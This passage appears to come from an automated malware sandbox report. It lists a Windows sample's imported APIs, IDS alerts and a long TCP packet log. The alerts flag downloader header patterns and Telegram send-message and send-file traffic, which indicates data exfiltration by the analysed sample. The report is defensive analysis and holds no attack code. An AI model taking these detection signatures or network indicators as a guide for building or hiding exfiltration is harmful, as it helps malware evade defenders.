FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T00:07:28.723789+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49978	142.250.184.238	443	TCP
2025-01-11T00:07:33.507170+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49980	132.226.247.73	80	TCP
2025-01-11T00:07:34.866831+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49980	132.226.247.73	80	TCP
2025-01-11T00:07:35.434003+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49982	104.21.16.1	443	TCP
2025-01-11T00:07:36.194675+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49983	132.226.247.73	80	TCP
2025-01-11T00:07:36.802620+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49984	104.21.16.1	443	TCP
2025-01-11T00:07:38.180425+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49986	104.21.16.1	443	TCP
2025-01-11T00:07:39.500978+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49988	104.21.16.1	443	TCP
2025-01-11T00:07:42.260446+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49992	104.21.16.1	443	TCP
2025-01-11T00:07:44.901196+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49996	104.21.16.1	443	TCP
2025-01-11T00:07:45.916213+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49997	149.154.167.220	443	TCP
2025-01-11T00:08:03.369784+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.10	49999	149.154.167.220	443	TCP
2025-01-11T00:08:13.281560+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.10	50001	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:07:27.509321928 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:27.509427071 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:27.509561062 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:27.519884109 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:27.519933939 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.181372881 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.181454897 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.182131052 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.182179928 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.420636892 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.420669079 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.421657085 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.421742916 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.424221039 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.467341900 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.723862886 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.723992109 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.724083900 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.724152088 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.724170923 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.724203110 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.724232912 CET	443	49978	142.250.184.238	192.168.2.10
Jan 11, 2025 00:07:28.724236965 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.724353075 CET	49978	443	192.168.2.10	142.250.184.238
Jan 11, 2025 00:07:28.753489971 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:28.753596067 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:28.753683090 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:28.754053116 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:28.754091024 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:29.416795015 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:29.416966915 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:29.420733929 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:29.420764923 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:29.421031952 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:29.421207905 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:29.421713114 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:29.463325024 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.897948027 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.898049116 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.904414892 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.904494047 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.916259050 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.916359901 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.916390896 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.916925907 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.922460079 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.924345970 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.990336895 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.990446091 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.990514994 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.990637064 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.990653992 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.990813971 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.994777918 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.994839907 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.994857073 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.994874001 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.994905949 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.994936943 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.994946957 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.996344090 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.999627113 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.999689102 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:31.999703884 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:31.999876976 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.006123066 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.006190062 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.006205082 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.006345034 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.012197018 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.012263060 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.012284040 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.012343884 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.018426895 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.018631935 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.018646955 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.018840075 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.024799109 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.024866104 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.024893045 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.025048971 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.030512094 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.030586958 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.030647039 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.030786991 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.036365032 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.036510944 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.036571026 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.036670923 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.042171001 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.042273045 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.042334080 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.042443991 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.047971964 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.048055887 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.056607008 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.056674957 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.056710958 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.056811094 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.082469940 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.082638025 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.082659960 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.082694054 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.082765102 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.087172031 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.087296009 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.087347984 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.087560892 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.087575912 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.087829113 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.091876984 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.091999054 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.092016935 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.092109919 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.092175961 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.092191935 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.092346907 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.092360020 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.092581034 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.096611023 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.096698046 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.096719027 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.096826077 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.096892118 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.096906900 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.097053051 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.101470947 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.101536036 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.101572990 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.101615906 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.101644993 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.104356050 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.104475975 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.108366013 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.108413935 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.109143019 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.112373114 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.112397909 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.113514900 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.113687992 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.113997936 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.114016056 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.114110947 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.118442059 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.118524075 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.118551016 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.118768930 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.123039007 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.123135090 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.123158932 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.123455048 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.127649069 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.127710104 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.127732038 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.128334045 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.132023096 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.132344007 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.132363081 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.132402897 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.136190891 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.136348963 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.136373043 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.136414051 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.140356064 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.140626907 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.140655041 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.140846014 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.144397020 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.144581079 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.144598007 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.144771099 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.148631096 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.148699999 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.148718119 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.148964882 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.151904106 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.151990891 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.152030945 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.152331114 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.155530930 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.155618906 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.155641079 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.155814886 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.159096956 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.159177065 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.159214973 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.159382105 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.159392118 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.159567118 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.174923897 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175055027 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.175081015 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175199986 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175297976 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175299883 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.175353050 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175518036 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.175529003 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175749063 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.175755978 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175815105 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.175822020 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.175868988 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.176001072 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.176363945 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.176372051 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.176409006 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.176414013 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.176455021 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.176461935 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.176542997 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.177051067 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.177123070 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.177131891 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.177167892 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.179275036 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.179411888 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.179425001 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.179502964 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.182276011 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.182375908 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.182391882 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.182676077 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.183620930 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.183676958 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.183727026 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.183897018 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.187114954 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.187185049 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.187208891 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.187334061 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.188008070 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.188086987 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.188100100 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.188169956 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.192111969 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.192253113 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.192280054 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.192337990 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.192353010 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.192578077 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.192585945 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.192634106 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.196846008 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.197010994 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.197019100 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.197108984 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.197164059 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.197170973 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.197225094 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.201519012 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.201749086 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.201764107 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.201864004 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.201870918 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.201889992 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.201981068 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.206125021 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.206216097 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.206286907 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.206321955 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.206474066 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.206490040 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.206540108 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.210848093 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.210930109 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.210966110 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.210966110 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.211013079 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.211062908 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.211062908 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.211062908 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.215462923 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.215542078 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.215569973 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.215581894 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.215594053 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.215610027 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.215641975 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.216933012 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.217098951 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.219976902 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.220041037 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.220108986 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.220122099 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.220161915 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.220916033 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.224076986 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.224323034 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.224376917 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.224451065 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.224474907 CET	443	49979	142.250.181.225	192.168.2.10
Jan 11, 2025 00:07:32.224616051 CET	49979	443	192.168.2.10	142.250.181.225
Jan 11, 2025 00:07:32.224692106 CET	443	49979	142.250.181.225	192.168.2.10
